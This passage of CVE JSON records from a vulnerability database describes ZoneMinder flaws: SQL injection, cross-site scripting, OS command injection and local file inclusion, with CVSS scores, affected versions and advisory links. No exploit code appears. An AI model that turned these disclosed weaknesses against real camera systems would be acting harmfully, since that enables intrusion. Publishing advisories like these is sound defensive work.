"timestamp": "2024-08-13T17:33:59.888497Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-13T17:34:56.389Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "zoneminder",
"vendor": "ZoneMinder",
"versions": [
{
"status": "affected",
"version": "\u003c 1.36.34"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "ZoneMinder is a free, open source Closed-circuit television software application. In WWW/AJAX/watch.php, Line: 51 takes a few parameter in sql query without sanitizing it which makes it vulnerable to sql injection. This vulnerability is fixed in 1.36.34."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-89",
"description": "CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-08-12T19:39:34.575Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-2qp3-fwpv-mc96",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-2qp3-fwpv-mc96"
},
{
"name": "https://github.com/ZoneMinder/zoneminder/commit/677f6a31551f128554f7b0110a52fd76453a657a",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/ZoneMinder/zoneminder/commit/677f6a31551f128554f7b0110a52fd76453a657a"
},
{
"name": "https://github.com/ZoneMinder/zoneminder/commit/a194fe81d34c5eea2ab1dc18dc8df615fca634a6",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/ZoneMinder/zoneminder/commit/a194fe81d34c5eea2ab1dc18dc8df615fca634a6"
}
],
"source": {
"advisory": "GHSA-2qp3-fwpv-mc96",
"discovery": "UNKNOWN"
},
"title": "ZoneMinder Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027) in watch.php"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-41884",
"datePublished": "2024-08-12T19:39:34.575Z",
"dateReserved": "2023-09-04T16:31:48.224Z",
"dateUpdated": "2024-08-13T17:34:56.389Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2020-25730 (GCVE-0-2020-25730)
Vulnerability from cvelistv5 – Published: 2024-04-04 00:00 – Updated: 2024-11-04 18:42
VLAI?
Summary
Cross Site Scripting (XSS) vulnerability in ZoneMinder before version 1.34.21, allows remote attackers execute arbitrary code, escalate privileges, and obtain sensitive information via PHP_SELF component in classic/views/download.php.
Severity ?
8.2 (High)
CWE
- n/a
Assigner
References
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2020-25730",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-04T15:46:50.759677Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-04T18:42:35.447Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-04T15:40:36.960Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://github.com/ZoneMinder/zoneminder/commit/9268db14a79c4ccd444c2bf8d24e62b13207b413"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Cross Site Scripting (XSS) vulnerability in ZoneMinder before version 1.34.21, allows remote attackers execute arbitrary code, escalate privileges, and obtain sensitive information via PHP_SELF component in classic/views/download.php."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-04-04T07:15:03.188180",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://github.com/ZoneMinder/zoneminder/commit/9268db14a79c4ccd444c2bf8d24e62b13207b413"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2020-25730",
"datePublished": "2024-04-04T00:00:00",
"dateReserved": "2020-09-17T00:00:00",
"dateUpdated": "2024-11-04T18:42:35.447Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-26039 (GCVE-0-2023-26039)
Vulnerability from cvelistv5 – Published: 2023-02-25 01:31 – Updated: 2025-03-10 21:05
VLAI?
Title
ZoneMinder vulnerable to OS Command injection in daemonControl() API
Summary
ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 contain an OS Command Injection via daemonControl() in (/web/api/app/Controller/HostController.php). Any authenticated user can construct an api command to execute any shell command as the web user. This issue is patched in versions 1.36.33 and 1.37.33.
Severity ?
7.1 (High)
CWE
- CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| ZoneMinder | zoneminder |
Affected:
< 1.36.33
Affected: >= 1.37.0, < 1.37.33 |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T11:39:06.485Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-44q8-h2pw-cc9g",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-44q8-h2pw-cc9g"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-26039",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-03-10T20:56:57.202881Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-03-10T21:05:12.912Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "zoneminder",
"vendor": "ZoneMinder",
"versions": [
{
"status": "affected",
"version": "\u003c 1.36.33"
},
{
"status": "affected",
"version": "\u003e= 1.37.0, \u003c 1.37.33"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 contain an OS Command Injection via daemonControl() in (/web/api/app/Controller/HostController.php). Any authenticated user can construct an api command to execute any shell command as the web user. This issue is patched in versions 1.36.33 and 1.37.33."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-02-25T01:31:36.622Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-44q8-h2pw-cc9g",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-44q8-h2pw-cc9g"
}
],
"source": {
"advisory": "GHSA-44q8-h2pw-cc9g",
"discovery": "UNKNOWN"
},
"title": "ZoneMinder vulnerable to OS Command injection in daemonControl() API"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-26039",
"datePublished": "2023-02-25T01:31:36.622Z",
"dateReserved": "2023-02-17T22:44:03.149Z",
"dateUpdated": "2025-03-10T21:05:12.912Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-26038 (GCVE-0-2023-26038)
Vulnerability from cvelistv5 – Published: 2023-02-25 01:27 – Updated: 2025-03-10 21:05
VLAI?
Title
ZoneMinder contains Local File Inclusion vulnerability via `web/ajax/modal.php`
Summary
ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 contain a Local File Inclusion (Untrusted Search Path) vulnerability via web/ajax/modal.php, where an arbitrary php file path can be passed in the request and loaded. This issue is patched in versions 1.36.33 and 1.37.33.
Severity ?
5.4 (Medium)
CWE
- CWE-426 - Untrusted Search Path
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| ZoneMinder | zoneminder |
Affected:
< 1.36.33
Affected: >= 1.37.0, < 1.37.33 |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T11:39:06.482Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-wrx3-r8c4-r24w",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-wrx3-r8c4-r24w"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-26038",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-03-10T20:59:50.438578Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-03-10T21:05:18.989Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "zoneminder",
"vendor": "ZoneMinder",
"versions": [
{
"status": "affected",
"version": "\u003c 1.36.33"
},
{
"status": "affected",
"version": "\u003e= 1.37.0, \u003c 1.37.33"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 contain a Local File Inclusion (Untrusted Search Path) vulnerability via web/ajax/modal.php, where an arbitrary php file path can be passed in the request and loaded. This issue is patched in versions 1.36.33 and 1.37.33."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-426",
"description": "CWE-426: Untrusted Search Path",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-02-25T01:27:39.450Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-wrx3-r8c4-r24w",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-wrx3-r8c4-r24w"
}
],
"source": {
"advisory": "GHSA-wrx3-r8c4-r24w",
"discovery": "UNKNOWN"
},
"title": "ZoneMinder contains Local File Inclusion vulnerability via `web/ajax/modal.php`"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-26038",
"datePublished": "2023-02-25T01:27:39.450Z",
"dateReserved": "2023-02-17T22:44:03.148Z",
"dateUpdated": "2025-03-10T21:05:18.989Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}